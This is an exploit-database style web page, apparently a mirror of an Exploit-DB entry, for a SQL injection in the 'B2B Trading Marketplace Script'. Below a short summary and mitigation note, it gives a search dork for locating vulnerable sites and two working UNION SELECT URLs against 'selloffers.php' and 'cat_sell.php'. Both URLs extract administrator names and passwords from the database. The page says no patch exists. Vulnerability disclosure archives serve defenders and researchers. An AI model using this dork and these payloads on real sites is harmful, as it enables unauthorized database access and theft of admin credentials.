header-logo
Suggest Exploit
vendor:
B2B Trading Marketplace Script
by:
AnGrY BoY
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: B2B Trading Marketplace Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

B2B Trading Marketplace SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable application. The vulnerable code is located in the ‘cat_sell.php’ and ‘selloffers.php’ files. An attacker can send a malicious SQL query to the vulnerable application, which will allow the attacker to extract sensitive information from the database, such as usernames and passwords.

Mitigation:

The application should use parameterized queries to prevent SQL injection attacks. Input validation should also be used to prevent malicious input from being passed to the application.
Source

Exploit-DB raw data:

[+]  B2B Trading Marketplace SQL Injection Vulnerability

[+]  Software : B2B Trading Marketplace Script
[+]  Author   : AnGrY BoY
[+]  Contact  : h4kurd@hotmail.com & h4kurd@yahoo.com
[+]  Home     : http://www.kurd-security.com    http://www.h4kurd.com
=====================================================================================


[+]  Dork     : cat_sell.php?cid=  or  selloffers.php?cid=


[+]expolit:
                                      
http://localhost/path/selloffers.php?cid=1+union+all+select 1,concat(sb_admin_name,0x3e,sb_pwd),3,4,5,6,7,8+from+b2b_admin--	

or 
                            
http://localhost/path/cat_sell.php?cid=1+union+all+select 1,concat(sb_admin_name,0x3e,sb_pwd),3,4,5,6,7,8+from+sbbleads_admin--


[+] example
[+] http://www.youtube.com/watch?v=uEK_Ah3htr0
======================================================================================
[+]Special Thanks:- Hangaw_hawlery & FormatXformaT   and all kurd-security members

Navigation

Suggest Exploit

Services By CQR